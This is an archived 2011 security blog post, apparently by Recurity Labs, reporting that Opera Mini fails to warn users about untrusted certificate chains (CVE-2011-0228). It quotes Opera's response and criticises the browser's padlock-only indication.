August 2011 Archives

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, followed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue, orginially reported for Apple iOS.

Upon filing a bug with Opera Software (ID SKIRNE-136848), we tried to contact them directly. With some external help, we managed to get in contact with security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and the obtain the result before continuing.

For more about Opera Mini security see
http://www.opera.com/mobile/help/faq/#security.

Reviewing the provided FAQ URL, we can learn that Opera Mini will show a padlock (at the top right corner) if the connection to the web site was secured. No padlock is shown for unsecured sites using HTTP.
When testing Opera Mini with https://iSSL.recurity.com, no padlock is shown. However, the URL in the address bar still says https:// with no indication that anything might be wrong with that. Judging from the user feedback we received, it is not clear to the users that the absense of the padlock means that the certificate validation failed.
In our emulation environment, we also discovered that on small screen devices, the padlock might not even be on-screen when loading a site.

Opera could easily display the failed certificate verification using other means than dialog boxes, e.g. through a red background in the address bar, similar to Internet Explorer.
Given the current approach, we recommend to not use Opera Mini for anything requiring a secure connection to a web site, especially considering that Opera Mini does not provide end-to-end encryption in any case.


Posted by FX | Permanent link